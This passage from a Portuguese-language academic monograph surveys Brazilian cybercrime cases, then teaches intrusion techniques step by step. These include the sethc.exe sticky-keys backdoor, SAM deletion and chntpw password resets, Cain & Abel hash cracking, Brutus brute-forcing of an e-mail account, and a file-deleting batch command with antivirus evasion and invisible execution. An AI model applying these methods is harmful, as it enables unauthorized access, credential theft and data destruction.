um banco de investimentos de São Paulo para evitar o roubo de US$ 2 milhões. O cracker
enviava e-mails para o banco com informações sigilosas (para provar que tinha acesso ao
sistema) e passava um número de celular para contato (o celular foi comprado com os dados
de um dos diretores da empresa). O grande erro do cracker foi comparecer pessoalmente para
receber o dinheiro na sede do banco localizado na AV. Paulista, em São Paulo, onde agentes
do Departamento de Investigações Sobre Crime Organizado (DEIC) prenderam o criminoso
(AGÊNCIA DO ESTADO, 2010).


     2.9.2   Invasões


   No dia 30 de maio de 2010, um domingo, o site da Ordem dos Advogados do Brasil
(OAB) foi invadido e ficou com uma imagem dizendo ser de autoria dos “Brazilians
Defacers” e contendo trocadilhos, palavras de baixo calão e frases de repúdio ao governo do
25



Presidente Lula. A imagem permaneceu no site até às 21h do domingo e, posteriormente, o
site ficou em manutenção (PAVARIN, 2010).
   Nem quem comanda o país está imune. Logo após o Partido dos Trabalhadores (PT) ter
ficado mais de 24 horas com seu site fora do ar em um final de semana devido a um problema
decorrente de uma invasão e, também por mais de 24 horas o Partido do Movimento
Democrático Brasileiro (PMDB) ficar com o site indisponível pelo mesmo problema, no dia
19/04/2010, outro domingo, o site do Partido da Social Democracia Brasileira (PSDB)
também foi invadido. No fim de semana, o cracker invadiu o site por pelo menos duas vezes e
acrescentou a frase “Partido dos corruptos” na página inicial. Após algum tempo, o internauta
era direcionado automaticamente para uma página de autoria do cracker que expunha 40
propostas para o Brasil. O site ficou indisponível toda a madrugada do sábado para o
domingo, foi colocado em funcionamento novamente ao meio-dia, quando sofreu um novo
ataque. Por volta das 20h da segunda-feira o site ainda encontrava-se indisponível (URIBE,
2010).


   2.9.3 Sequestro


   Em meados de 2010, um jovem de 19 anos foi sequestrado e mantido em cativeiro durante
cinco dias em Ilha Comprida (SP), tendo sua família aterrorizada pelos sequestradores que,
em um dos piores momentos da negociação, foi questionada, pelo sequestrador, se gostaria de
receber o dedo ou a orelha do jovem como um “presente”. Felizmente, o estudante foi
libertado pela polícia e os nove integrantes da quadrilha foram presos.
   Para este trabalho acadêmico, o fato mais relevante a ser analisado no caso de sequestro
acima descrito é a forma como a quadrilha escolhia suas vítimas. A polícia informou que os
sequestradores passavam horas em sites de relacionamento na internet à procura de pessoas
com sinais de riqueza. Em outras palavras, a internet servia como uma ferramenta para os
criminosos localizarem pessoas monetariamente favorecidas, além de descobrir o
comportamento das vítimas (horário de entrada e saída de casa, entre outras informações). O
pai do estudante sequestrado reconheceu que o filho expôs informações demais na internet
(G1SP, 2010).
26



3   Técnicas e conhecimentos básicos


    Popularmente conhecidas como “receitas de bolo”, algumas técnicas que necessitam de
pouco ou nenhum conhecimento de informática podem ser utilizadas para obter acessos não
autorizados, danificar sistemas, obter ganhos financeiros, descobrir informações sigilosas ou,
entre as diversas aplicações possíveis, ajudar em algum dos passos dados durante a realização
de um ataque.
    Uma das primeiras coisas que um cracker aprende ou procura aprender é como quebrar
senhas. Senhas de sistemas amplamente utilizados (como o Windows) têm suas brechas
frequentemente exploradas; muitas vezes as brechas encontradas permanecem abertas durante
anos.
    É comum que bancos e sistemas que necessitam de segurança em nível elevado, utilizem
outras formas de autenticação de usuários privilegiados para a liberação de acessos, como, por
exemplo, autenticações biométricas, tokens (dispositivos que geram senhas diferentes após
um tempo determinado) e cartões magnéticos. Ainda assim, em sistemas 100% lógicos, a
senha ainda é a forma mais utilizada para garantir que o solicitante do acesso seja realmente a
pessoa autorizada a acessar.


    3.1 Engenharia social


    Com o avanço da tecnologia e algoritmos de criptografia, a quebra de senhas por métodos
puramente técnicos nem sempre é a melhor opção. Uma das falhas mais explorada em casos
de emprego de tecnologias avançadas para controle de acessos é a falha humana.
    Em um sistema corporativo, obter acesso a um sistema somente com a engenharia social,
pode ser um procedimento relativamente simples. Toda grande empresa tem um sistema de
suporte ao usuário (chamado de Help Desk ou Service desk) que, em sua maioria, adota
padrões de segurança. Para o controle de acesso e proteção das senhas, uma ação adotada por
boa parte dos serviços de suporte aos usuários dos sistemas corporativos é a solicitação de
dados pessoais de seus funcionários antes de fazer a troca (reset) de uma senha.
    Em grandes empresas, as senhas são frequentemente esquecidas pelos funcionários, o que
torna o trabalho de troca de senhas uma ação normal e constante por parte dos analistas de
suporte ao usuário ou pelos responsáveis por esta tarefa. Uma empresa que solicita somente o
número do CPF ou outro documento de um usuário antes de trocar sua senha, pode ter seu
27



sistema de segurança facilmente burlado. Para exemplificar o uso da engenharia social que
pode ser feito neste caso, é possível descrever um cenário no qual um funcionário (mais
conhecido como insider) foi pago por uma concorrente para obter informações sigilosas que
foram enviadas para a caixa de correio eletrônico de seu chefe ou diretor. O funcionário
criminoso pode utilizar a internet ou algum outro meio para conseguir o CPF do titular da
conta de e-mail e, simplesmente, ligar para o help desk, dizer que esqueceu a senha, confirmar
os dados da vítima e obter uma nova senha. A desvantagem deste processo é que a
possibilidade de a vítima rapidamente descobrir que há algo de errado com sua conta de e-
mail é muito alta, o que obriga o criminoso a, assim que conseguir o acesso, copiar o mais
rápido possível as informações que podem ser úteis.


       3.2 Outras formas de ligar o computador


   Com acesso físico a um computador, a tarefa de investigá-lo, danificá-lo ou qualquer outra
prática torna-se, obviamente, mais fácil. Obtendo-se o acesso físico ao computador e um pen-
drive, é possível descobrir senhas, visualizar arquivos e até mesmo apagar todo o conteúdo
armazenado.
   Quando um computador comum é iniciado, primeiro são executadas instruções básicas
para o funcionamento do sistema e só depois disso é acessado o local onde está o sistema
operacional (como um HD com o Windows) e o computador continua a carregar os arquivos
armazenados.
   Na maioria dos computadores é disponibilizada uma opção para o usuário escolher a partir
de qual local ele deseja que o sistema seja carregado. Para obter acesso total ao computador e
a tudo o que nele está instalado, uma boa solução é utilizar sistemas operacionais paralelos ou
sistemas que inicializam a partir de CD/DVD, pen-drives ou a partir da rede.
   Sistemas operacionais paralelos nada mais são do que outros sistemas operacionais
instalados no mesmo computador. Sistemas que inicializam a partir de CD/DVD (também
conhecidos como Live-CDs), são sistemas operacionais, geralmente completos, que em sua
grande maioria não alteram nenhuma configuração no computador e deixam poucos ou
nenhuns rastros.
   Para inicializar um computador sem a necessidade de carregar o Windows, por exemplo,
basta fazer o download de uma distribuição Live-CD do Linux, e configurar o computador
para que inicie a partir do CD. As opções de inicialização (chamadas de opções de Boot)
28



costumam variar pouco de computador para computador e, para acessá-las, deve-se digitar
uma tecla que varia entre o F2, Delete, Esc, F6, F8 e F10, logo que o computador é ligado
(antes de o sistema operacional ser carregado).
   Neste trabalho, para exemplificar alguns ataques, é utilizada a quarta versão da
distribuição Back-Track do Linux. Esta distribuição foi especialmente criada para a realização
de testes de penetração, porém, outras podem ser utilizadas. Há também a possibilidade de
iniciar sistemas a partir de pen-drives e Live-CDs baseados em sistemas Windows, que podem
ser facilmente encontrados digitando-se os termos “boot pendrive” e “Windows PE” nos sites
de busca.
   Também é possível obter acesso total ao sistema com alguns CDs de instalação, como, por
exemplo, o DVD de instalação do Windows Vista. Para visualizar, copiar ou apagar algum
arquivo a partir de um DVD de instalação do Windows Vista é necessário configurar o
computador para que inicie pelo DVD e então aparecerá a mensagem para apertar uma tecla
para iniciar a partir do CD ou DVD. Ao apertar uma tecla qualquer, o sistema começará a
carregar o programa de instalação. Após esta etapa, irá aparecer a tela para a escolha do
idioma e, ao clicar em “Avançar”, o sistema trará as opções de instalar o Windows ou reparar
o computador. A opção de reparar o computador deve ser escolhida e, após a exibição da tela
apresentando a instalação a ser reparada, será mostrada a janela de recuperação do sistema,
com várias opções, inclusive o acesso às linhas de comando com opções de administrador,
como na figura abaixo.


   Tela de recuperação retirada do DVD do Windows Vista. Figura 3
29



   3.3 Obter acesso completo a sistemas Windows protegidos por senha


   A grande maioria dos sistemas operacionais (como o MAC OS, Linux, Unix, etc.)
possuem graves brechas de segurança, porém, devido à quantidade de usuários dos sistemas
Windows, ele é o mais explorado.
   Há variadas formas de se conseguir elevação de privilégios em sistemas operacionais
Windows. As mais óbvias e conhecidas são a exclusão ou descoberta de senhas de usuários
administradores. Porém, há outras formas de conseguir acesso de administrador, como a
utilização de outras contas nativas do Windows a exemplo da conta “system” (com mais
privilégios que a conta de administrador), a conta de convidado (geralmente limitada) e a
utilização de programas que utilizam outras contas mesmo quando executados por usuários
com acesso limitado.
   Das técnicas mencionadas, talvez a mais utilizada e conhecida para obter acesso
privilegiado a sistemas Windows é usufruir da conta “system”. Uma forma de utilizá-la é
executar o programa que terá privilégios de sistema antes de algum usuário efetuar o logon
(acesso ao sistema). Um exemplo de como isso pode ser feito é utilizar a proteção de tela ou
as teclas de atalho do Windows, pois elas podem ser ativadas antes de algum usuário digitar
seus dados e acessar o sistema (tela de logon).
   Quando configurada, a proteção de tela entra automaticamente após certo período de
tempo e o programa responsável por sua execução é o “Logon.scr”, que fica em
C:WindowsSystem32 e, em versões mais antigas do Windows, os arquivos de proteção de
tela são os com extensão “.SCR” e costumam ficar na pasta C:WINDOWSSYSTEM.
   A proteção de tela encontra-se habilitada na maioria dos sistemas Windows e, quando
executada, no caso dos sistemas mais novos, qualquer programa que tenha o nome
“Logon.scr” e estiver dentro da pasta C:WindowsSystem32 será executado.
   Uma desvantagem de utilizar a proteção de tela para obter acesso não autorizado é que
nem sempre ela está ativada e, mesmo quanto está, é necessária a espera de alguns minutos ou
até horas para a execução do programa. A utilização das teclas de atalho do Windows para a
execução de programas a partir da conta “system” mostra-se mais eficaz devido ao fato de ser
possível sua execução a qualquer momento (basta apertar a tecla Shift por cinco vezes) e por
estar habilitada em praticamente todos os sistemas operacionais Windows.
   Na prática, para utilizar as teclas de atalho a fim de executar um programa com acessos de
sistema, deve-se renomear ou apagar o arquivo “sethc.exe”, que fica localizado no diretório
30



C:WindowsSystem32, deixar dentro deste diretório o arquivo que queremos executar e
renomear o novo programa para “sethc.exe”, conforme a figura a seguinte.


   Prompt de comando (cmd.exe) renomeado para “sethc.exe”. Figura 4




   No figura acima, é possível visualizar o console de comandos do Windows (prompt de
comando; Programa “cmd.exe”) renomeado para “sethc.exe”. O prompt de comando fica
localizado no mesmo diretório do programa de teclas de atalho. A partir dele, é possível
realizar diversas ações. No exemplo do sistema acima, a qualquer momento em que a tecla
Shift for pressionada por cinco vezes consecutivas, será aberta uma janela para a inserção de
linhas de comando.
   As teclas de atalho funcionam mesmo antes de algum usuário efetuar o logon (visando a
acessibilidade de usuários com necessidades especiais). Portanto, caso as alterações acima
sejam feitas da maneira correta e a tecla Shift for pressionada por cinco vezes consecutivas na
tela de logon, será aberta uma janela do prompt de comando com mais privilégios que a conta
de administrador do sistema.
31



   Na figura abaixo, o prompt de comandos foi utilizado para trocar a senha de um usuário
com o comando “net user nome_do_usuário senha_desejada”.


       Alteração da senha. Figura 5




   Alguns sistemas mais seguros substituem automaticamente o arquivo “sethc.exe”, por um
novo, devido ao fato de ele ser um arquivo do sistema. Para resolver esse problema é preciso
renomear rapidamente o novo arquivo antes da substituição. A pessoa com intenções de burlar
o sistema também pode fazer a substituição do arquivo através de um Live-CD com opção de
escrita, caso não possua nem mesmo uma conta limitada no computador da vítima.
   Esta técnica já é antiga e conhecida, porém, ainda funciona no mais novo sistema
operacional da Microsoft, o Windows 7, que não teve a falha corrigida. O único possível
problema que pode ocorrer no Windows Vista/7 é o sistema não permitir que o arquivo seja
renomeado. Neste caso, é preciso alterá-lo a partir de um Live-CD ou tornar-se dono do
arquivo e liberar as permissões. Para obter a propriedade sobre o arquivo e, posteriormente,
liberar as permissões de escrita, é preciso seguir os seguintes passos:
   - Clicar com o botão direito sobre o arquivo “sethc.exe”, selecionar as propriedades, clicar
na aba segurança e, posteriormente, no botão “ Avançadas”.
32


Obter propriedade de arquivo. Figura 6




-Na janela que aparecer, é preciso selecionar a aba proprietário e clicar no botão editar.


Obter propriedade de arquivo (2). Figura 7
33



   Ao clicar em “Editar”, aparecerá a tela para modificar o proprietário do arquivo. Basta
escolher o novo proprietário, clicar em aplicar e em OK.


   Obter propriedade de arquivo (3). Figura 8




   Após obter a propriedade do arquivo, o último passo é liberar as opções de escrita no
arquivo para que seja possível renomeá-lo ou apagá-lo. Para isso, é necessário clicar
novamente com o botão direito do mouse em “sethc.exe”, selecionar a opção “Propriedades”,
aba “Segurança”, botão “Editar”, selecionar o usuário, liberar as permissões, clicar em
“Aplicar” e “Yes”.


   Obtendo permissões. Figura 9
34



   3.3.1 Senhas do Windows 95,98 e Millennium


   Em versões antigas como as de 95, 98 e a Millennium, para acessar um sistema com
senha, bastava clicar em cancelar na tela que solicitava a senha para acesso ao sistema.
Algumas medidas de segurança podiam ser tomadas para incrementar a segurança, mas parte
das medidas poderia ser fechada ao se pressionar as teclas Ctrl+Alt+Delete no teclado e
escolhendo a opção de finalizar tarefa, a fim de encerrar o programa que bloqueava o acesso
ou apagar os arquivos com o nome do usuário e extensão “PWL”, localizados em
“C:WINDOWS” (OLIVEIRA, 2000).
   Na figura abaixo, é possível verificar a tela de um computador com o Windows
Millennium, no qual há somente um usuário (chamado PI) com senha. Para deixar o sistema
sem senha de acesso, basta apagar o arquivo.


Tela do Windows Millennium. Figura 10




   3.3.2 Senhas do Windows NT e 2000


   Até mesmo as versões NT e 2000, consideradas mais seguras, podem ter todas as suas
senhas e contas de usuários apagadas, somente com a exclusão de arquivos. No caso destes
sistemas, o arquivo com informações de usuários e senhas é o arquivo SAM localizado na
pasta C:WINNTsystem32config. Para excluir as contas de usuários e suas respectivas
senhas, basta apagar três arquivos: na pasta C:WINNTsystem32config os arquivos SAM e
SAM.LOG e, na pasta C:winntrepair, o arquivo SAM. A diferença dos sistemas baseados no
Windows NT é não ser possível a exclusão de arquivos de senhas com o sistema funcionando
e sem nenhuma ferramenta especial, pois o arquivo fica em uso. A solução é apagá-los com
outro sistema operacional instalado no computador, utilizando um Live-cd, pen-drive com o
Linux ou Windows instalado ou o CD de instalação de algum sistema operacional.
35



   3.3.3 Senhas do Windows XP, 2003, Vista e 7


   No caso dos sistemas operacionais mais recentes da Microsoft, apagar ou trocar senhas
dos usuários ou administradores do sistema sem possuir uma conta, é uma tarefa que exige a
utilização de diferentes procedimentos ou ferramentas, pois não se resume em excluir
arquivos. Uma das formas mais simples de se obter acesso às contas de administrador em
sistemas operacionais Windows mais novos é utilizar algum CD de inicialização que contenha
ferramentas para realizar tal tarefa. Uma boa opção é o “Ultimate Boot CD (UBCD)” ou o
“Hiren´s BootCD”. Há também ferramentas mais avançadas e com diversas opções para a
manipulação de senhas e usuários em sistemas Windows. Para exemplificar o uso de
ferramentas com opções avançadas, utilizaremos o programa “chntpw” que, por padrão, já
vem instalado na distribuição “BackTrack” – do Linux.
   Dentre as opções que o “chntpw” oferece estão: editar o registro do Windows, editar
opções do console de recuperação, manipular senhas de usuários, desbloquear contas e incluir
uma conta limitada no grupo dos administradores. Vale lembrar que, para alterar corretamente
uma senha em sistemas Windows mais atuais, é preciso uma informação (hash) do arquivo
“system” que fica no mesmo diretório do arquivo “SAM”. O procedimento de troca de senha
é pouco mais complexo, portanto, apenas será explicado como é feito para apagar a senha de
uma conta de um usuário do sistema. Caso seja necessário colocar uma nova senha, basta
acessar a conta (que estará sem senha) e adicionar uma.
   Com o “BackTrack 4” iniciado a partir de um CD, DVD ou pendrive, é possível acessar
um HD com a instalação do Windows utilizando os seguintes comandos:
   cd /
   mkdir /media/teste
   mount dev/hda1 /media/teste
   O último comando deve ser modificado para “mount dev/sda1 /media/teste” caso o disco
rígido do computador utilize a tecnologia Serial Advanced Technology Attachment (SATA).
   Em casos de problemas com o acesso ao disco rígido que contém a instalação do
Windows, pode ser necessário forçar a montagem da partição. O seguinte comando pode ser
utilizado para forçar a montagem da partição:
   mount -t ntfs-3g /dev/hda1 /media/teste -o force
   Após a obtenção de acesso ao local onde o Windows está instalado, é possível verificar as
opções de manipulação do sistema com o comando:
36



   chntpw -i media/teste/WINDOWS/system32/config/SAM
   Caso não ocorra nenhum imprevisto, e o comando acima seja digitado corretamente
(levando em consideração letras maiúsculas e minúsculas), resultados conforme a imagem
seguinte deverão aparecer.


   Opções para alterar o sistema Windows. Figura 11




   Para apagar a senha de um usuário do sistema, a primeira opção deve ser selecionada.
   Caso a tecla “enter” seja pressionada sem a escolha de nenhuma opção, automaticamente
a primeira será escolhida. Após a escolha da primeira opção, será exibida uma lista com todos
os usuários que possuem uma conta no sistema e informações como, por exemplo, se a conta
está habilitada, bloqueada, o código em número hexadecimal do Relative-Identifier (RID) e se
a conta possui privilégios de administrador. Para alterar a senha de algum usuário, basta
digitar seu respectivo nome. Caso nenhum nome de usuário e nenhum RID sejam digitados, o
usuário “Administrador” será automaticamente selecionado se a tecla “enter” for pressionada.




   A figura seguinte ilustra como as opções de alteração de contas de usuários são
37



apresentadas pelo programa.


   Opções para alterar senhas dos usuários. Figura 12




   Como é possível visualizar na figura acima, o programa também exibe informações sobre
as políticas de senha do sistema e oferece opções para a alteração de contas de usuário.
   Ao selecionar a primeira opção “Edit user data and passwords”, o aplicativo faz uma
listagem das contas de usuários (quadro vermelho). As contas que aparecem com a opção
“dis/lock” estão bloqueadas ou desabilitadas.
   Após digitar o nome de um usuário ou seu respectivo RID em número hexadecimal, será
exibida uma tela com a qual será possível concluir a exclusão de senha de usuário. A
ilustração a seguir destaca com setas vermelhas as opções que devem ser selecionadas para
excluir com sucesso a senha de algum usuário do sistema.
38



   Como é possível verificar no exemplo abaixo, após a mensagem de sucesso apresentada
pelo aplicativo, em condições normais, basta salvar as alterações para que a operação seja
realizada com êxito.


   Finalização do processo de exclusão de senha. Figura 13




3.3.4 Descobrir senhas sem alterá-las


   O procedimento de descoberta de senha, além de mais vantajoso para um cracker ou
pessoa com más intenções, é bastante diferente e mais trabalhoso que a simples exclusão ou
troca de senha. (ASSUNÇÃO, 2002, p.55)
   Para exemplificar um processo simples de quebra de senhas, foi utilizado o programa
“Cain & Abel v4.9.36” e os arquivos “SAM” e “system” de um sistema Windows XP Media
39



Center com o Service Pack 2. Durante a elaboração desta monografia, este procedimento
também foi testado nos sistemas operacionais mais atuais da Microsoft, funcionando sem
problemas. Também a fim de exemplificar a obtenção dos arquivos de senha sem a
necessidade de utilizar um Live-CD ou outra forma de iniciar o sistema, foi utilizado o
programa “FTK Imager v2.5.3.14”. Qualquer forma de obtenção dos arquivos pode ser
utilizada, porém, o procedimento descrito abaixo pode ser útil para sistemas com dados
criptografados ou que possuem senhas no sistema básico de entrada e saída (BIOS) e não
permitem a inicialização a partir de um dispositivo móvel.
   A obtenção dos arquivos de senha com o sistema ainda em execução é possível com a
utilização de programas para recuperação de arquivos excluídos, como o “NTFS Reader” ou,
como na imagem abaixo, o “FTK Imager”.


   Obter arquivos “SAM” e “system” com o sistema em execução. Figura 14




       Após obter os arquivos que contêm informações sobre as senhas, a pessoa com a
intenção de descobri-las pode abrir os arquivos “SAM” e “system” com o programa “Cain &
Abel” e escolher um dos métodos de quebra de senhas disponíveis.
40



   A imagem abaixo ilustra as etapas realizadas para carregar os arquivos do sistema. Após a
realização das etapas, serão carregadas informações sobre todos os usuários do sistema.


   Utilização do Cain. Figura 15




   Este aplicativo oferece três opções para descobrir senhas de contas de usuários: ataque de
dicionário, força bruta e Rainbow Tables. Um ataque de dicionário é baseado em uma lista
(arquivo de texto) que contém uma grande quantidade de possíveis senhas. Pode ser um
método extremamente rápido e eficiente caso um bom arquivo de dicionário (wordlist) seja
utilizado. Uma Wordlist, além de comprada ou baixada da internet, pode ser criada por
programas como o “DCM” e o “Wordlist Producer” (TOMPSON, 2004, p159). O ataque de
força bruta, por sua vez, tenta todas as combinações possíveis entre caracteres previamente
escolhidos.
   Para armazenar as senhas dos usuários, o Windows utiliza uma sequência de números
hexadecimais (hash) para dificultar o processo de descoberta de senhas. O hash das senhas é
obtido através de um complexo cálculo matemático, o que aumenta significativamente o
tempo necessário para descobrir as senhas. Visando a diminuição deste tempo, arquivos
41



contendo uma lista de hashs já calculados (também conhecidos como Rainbow Tables)
frequentemente são utilizados com o intuito de diminuir o tempo do processo.
   Para a criação de Rainbow Tables, podem ser utilizadas ferramentas como o “Winrtgen”,
parte integrante do “Cain & Abel v4.9.36”.
   No exemplo abaixo é utilizado um ataque de força bruta que, apesar de ser um método
que pode levar horas ou até mesmo anos (dependendo da complexidade da senha e poder de
processamento) ainda é bastante eficiente, além de não necessário nenhum arquivo de
dicionário ou Rainbow Table para utilizá-lo.


   Força bruta com o Cain. Figura 16




   O “Cain & Abel” é uma poderosa ferramenta capaz de, entre outras coisas, descobrir
senhas de diversos sistemas por diferentes métodos. Senhas com menos de oito caracteres
podem ser descobertas com facilidade em menos de um dia. Neste exemplo, o programa levou
menos de um segundo para revelar uma senha de quatro dígitos (extremamente fraca). Na
figura anterior é possível verificar (círculo vermelho) que o aplicativo indica as possíveis
42



senhas com menos de oito dígitos.
   Crackeando. Figura 17




   O tempo de processamento que é necessário para a descoberta das senhas é aumentado
exponencialmente, caso a senha contenha caracteres especiais e seja composta por mais do
que sete caracteres. Segundo as estimativas de tempo feitas pelo software utilizado, uma
senha que possui caracteres especiais e cerca de quatorze dígitos, pode demorar até três anos
para ser quebrada em um computador comum com processador “Core 2 Duo” de 2,3 GHz.


   3.3.4.1 Senhas armazenadas no computador


   Senhas armazenadas no computador, em sua grande maioria, são facilmente decifradas e
não exigem tempo e processamento. O próprio “Cain & Abel” é capaz de decifrar, entre
outras senhas, as armazenadas no navegador de internet, senhas de redes sem fio e senhas de
e-mails armazenadas.
43



   De forma extremamente rápida é possível visualizar todas as senhas de e-mails de todos
os usuários do computador ou todas as senhas de redes sem fio, como na figura a seguir.


   Senhas das redes sem fio já acessadas. Figura 18




   3.3.4.2 Invasão de contas de e-mail e sites por meio da senha


   Há diversas maneiras de descobrir a senha de um e-mail. Um método que não se baseia
diretamente em erros cometidos por parte do usuário do e-mail é utilizar ferramentas que
tentam acessar o e-mail com diversas senhas até decifrá-la (THOMPSON, 2004, p.150).
   O “Brutus” é um programa capaz de descobrir senhas de sistemas acessados através do
protocolo Hipertext Transfer Protocol (HTTP), File Transfer Protocol (FTP.) – útil para
invasão de sites –, Post Office Protocol – protocolo de e-mail –, entre outros.
   Para exemplificar a quebra de senha de uma conta de e-mail, o endereço eletrônico
“papainoel3@yahoo.com.br” foi especialmente criado para este fim.
44



   Na tela principal da segunda versão do programa “Brutus”, apenas alguns itens são
necessários configurar para a realização da tentativa de ataque.


   Brutus. Figura 19




   Como o nome sugere, o “Brutus” suporta ataques de força bruta, porém, neste exemplo,
foi utilizada uma wordlist.


   Wordlist. Figura 20
45



   A palavra “feliznatal” foi incluída na lista de palavras e corresponde à senha do e-mail.
   Quando a utilização de wordlists é feita, a descoberta da senha somente é possível se na
lista de palavras existir a senha correta, fato que leva à conclusão de que a utilização de uma
boa wordlist é fundamental para o sucesso do procedimento.
   Na figura a seguir, é possível verificar a tela de sucesso de um ataque real feito à conta de
e-mail “papainoel3@yahoo.com.br”. O aplicativo tentou acessar a conta com as palavras que
estavam na wordlist até encontrar a sequência de caracteres correspondente à senha correta.


   Quebra de senha de e-mail. Figura 21




   Os dados utilizados no ataque como o servidor de e-mail (POP3) e a respectiva porta (a
porta110 é utilizada por padrão) foram obtidos sem dificuldades ao digitar “configurar
outlook yahoo” em um site de busca na internet.
46



   Para invadir um site e visualizar, copiar, excluir ou alterar arquivos um cracker pode
utilizar esta mesma ferramenta, apenas com configurações diferentes.
   Além de uma boa wordlist, o sucesso do ataque a um site também vai depender de uma
boa configuração das opções “connections” e “timeout”.


   Invasão de site. Figura 22




   A obtenção dos dados do servidor também pode ser feita através de sites de busca, com a
procura de páginas que contêm termos como “acessar ftp nome do local de hospedagem”.
Para saber onde o site está hospedado, basta pesquisar o domínio em sites como o
“http://www.whois.net/”.
   Após a obtenção da senha, para acessar o conteúdo do site a ser invadido, é possível
utilizar ferramentas dos próprios provedores de hospedagem (quando disponíveis) ou utilizar
programas como o “FileZilla” para visualizar, copiar, excluir ou modificar arquivos do site.
   Em boa parte dos provedores de hospedagem, a senha do Secure Shell (SSH) é a mesma
senha do servidor FTP. Nestes casos, é possível fazer a utilização de programas como o
“PuTTY” para manipular, além do conteúdo do servidor FTP, o banco de dados do site.
47



4   Técnicas que demandam conhecimentos básicos


    Neste capítulo, são abordadas técnicas que, para executá-las, é necessário possuir
conhecimentos básicos na área de informática ou, pelo menos, a leitura dos tópicos anteriores.
    Os códigos dos programas e de arquivos de execução em lote contidos nesta pesquisa
foram desenvolvidos exclusivamente para esta monografia e suas finalidades se limitam às
acadêmicas.


    4.1 Criação de um programa para fins maliciosos


    Para criar um programa de computador, evidentemente, é de extrema importância e quase
que indispensável possuir conhecimentos em linguagens de programação, porém, este
conhecimento não é um requisito obrigatório.
    Atualmente, códigos prontos de vírus são distribuídos e, com apenas algumas
modificações, o código pode tornar-se personalizado. É possível encontrar até mesmo sites
especializados em automatizar o processo de desenvolvimento de vírus para computadores, o
que criou um novo predicado dentro da categoria dos hackers iniciantes: os “apertadores de
botão”, termo que faz alusão aos botões “Next, Next e Finish” (RUFINO, 2002, p.23).


    4.1.2 Arquivos de processamento em lote (batch)


    Além de modificar códigos criados por outras pessoas, também é possível, a partir de
técnicas bem difundidas na internet, executar tarefas maliciosas com poucas linhas de
comandos. Um exemplo de como isso pode ser feito em um sistema Windows é abrir o
conhecido bloco de notas, digitar sem as aspas “del %homepath%Documents*.* /f/s/q” e
salvar o arquivo com a extensão “.bat”. Se for executado, todos os arquivos que estiverem na
pasta “Meus Documentos” serão excluídos.
    Um batch como o do exemplo acima, pode trazer um grande problema, caso documentos
importantes sejam apagados. Outro aspecto interessante dos arquivos de processamento em
lote é que dificilmente eles são bloqueados por programas antivírus, permitindo sua
distribuição via e-mail com maior facilidade (basta colocar em uma pasta compactada), se
comparados a programas comuns.
    A partir de um arquivo de batch é possível executar diversos programas, processar
48



comandos específicos e condicionais, o que faz de um arquivo de processamento em lote um
programa completo. O código abaixo é um programa completo (composto exclusivamente de
comandos disponíveis nas versões mais atuais dos sistemas operacionais da Microsoft) cujas
funções são: programar o computador para desligar, reiniciar, desligar computadores
remotamente, entre outras funções correlatas. Para fazer uso dele, não é necessário nenhum
compilador ou programa adicional. É preciso somente digitar os comandos abaixo em algum
editor de texto qualquer, salvar com a extensão “.bat” e executá-lo.


   rem Programa para desligar o computador
   rem Autor: Pedro Ramos
   @echo off
   color 1e
   title Programa que desliga o computador
   :Inicio
   cls
   echo.
   echo 1.Desligar
   echo 2.Reiniciar
   echo 3.Desligar ou reiniciar outro computador da rede
   echo 4.Fazer logoff
   echo 5.Hibernar
   echo 6.Cancelar desligamento
   echo 7.Sair deste programa
   echo.
   set /p escolha=Escolha uma tarefa(1,2,3,4,5,6 ou 7):
   if %escolha%==1 goto desligar
   if %escolha%==2 goto reiniciar
   if %escolha%==3 shutdown -i
   if %escolha%==4 shutdown -l
   if %escolha%==5 shutdown -h
   if %escolha%==6 shutdown -a
   if %escolha%==7 exit
   goto Inicio
   :desligar
49



cls
set /p seg=Tempo para o Desligamento (em segundos):
set /p msg=Digite uma mensagem de desligamento:
set /p force=Forcar desligamento (s/n):
if %force%==s set f=-f
if not %force%==s set f=
shutdown -s -t %seg% -c "%msg%" %f%
goto cancelar
:reiniciar
cls
set /p prog=Reiniciar com os programas atuais (somente para windows 7)(s/n):
if %prog%==s set r=-g
if not %prog%==s set r=-r
set /p seg=Tempo para o reinicio (em segundos):
set /p msg=Digite uma mensagem:
set /p force=Forcar reinicio (s/n):
if %force%==s set f=-f
if not %force%==s set f=
shutdown %r% -t %seg% -c "%msg%" %f%
:cancelar
cls
echo 1.Cancelar tarefa atual
echo 2.Voltar para a tela principal
echo 3.Sair do programa
set /p opcao=Escolha uma tarefa (1,2 ou 3):
if %opcao%==1 shutdown -a
if %opcao%==2 goto Inicio
if %opcao%==3 exit
goto cancelar
50



   Os resultados obtidos com a execução do programa são similares aos da imagem a
seguinte.


   Screenshots do batch. Figura 23




   Nesta monografia, o programa é útil para demonstrar as inúmeras possibilidades de
manipulação do sistema que um arquivo de execução em lotes pode oferecer. Por exemplo,
caso algum comando que execute atividades maliciosas seja inserido nas primeiras linhas do
programa, ele será acionado e, dependendo do código, não aparecerá nada na tela nem
influenciará no funcionamento do aplicativo.


4.1.2.1 Compilar um arquivo de processamento em lotes


   Uma das maiores desvantagens de utilizar um simples batch para disseminar vírus de
computadores, ou induzir algum usuário a executar atividades que ele não deseja, é o fato de o
arquivo poder ser aberto em qualquer editor de texto e ter seu código visualizado e estudado
por completo. Uma forma de corrigir este problema é transformar o arquivo de processamento
em lotes em um executável do tipo “.exe”. Com a finalidade de exemplificar o processo, serão
discutidas as funcionalidades do programa “Bat To Exe Converter v1.5”.
   Após o arquivo de processamento em lotes ser criado, resta apenas carregá-lo com o “Bat
To Exe Converter”, escolher o diretório onde o novo arquivo executável será salvo e clicar em
“Compile” para criar um arquivo não visualizável em qualquer editor de texto.
51



   Na imagem abaixo, é possível verificar que a opção “Invisible application” foi
selecionada, o que significa que o novo programa “apagar arquivos.exe” será executado de
forma imperceptível para o usuário.


   Compilar batch. Figura 24




   4.1.3 Como um vírus pode ser anexado a outro arquivo


   Diversos aplicativos, como o “Senna Spy EXE Maker 2001” e o “Cactus Joiner“, podem
ser utilizados para anexar um vírus a outro arquivo qualquer – como uma foto ou vídeo – e
executar o vírus de forma invisível para o usuário. O “Cactus Joiner“, por exemplo, oferece
até mesmo permissões para abrir portas no firewall de forma automática.
   O sistema operacional Windows também possui um programa nativo que é capaz de
52



realizar a tarefa. Apesar de pouco utilizado e conhecido, o aplicativo pode ser executado em
versões mais recentes do Windows com o comando “iexpress”. O “Winrar”, programa
amplamente conhecido e normalmente utilizado para compactar ou descompactar arquivos,
também possui opções pouco utilizadas ou conhecidas que permitem anexar um vírus a um
arquivo qualquer e executá-lo de forma invisível.
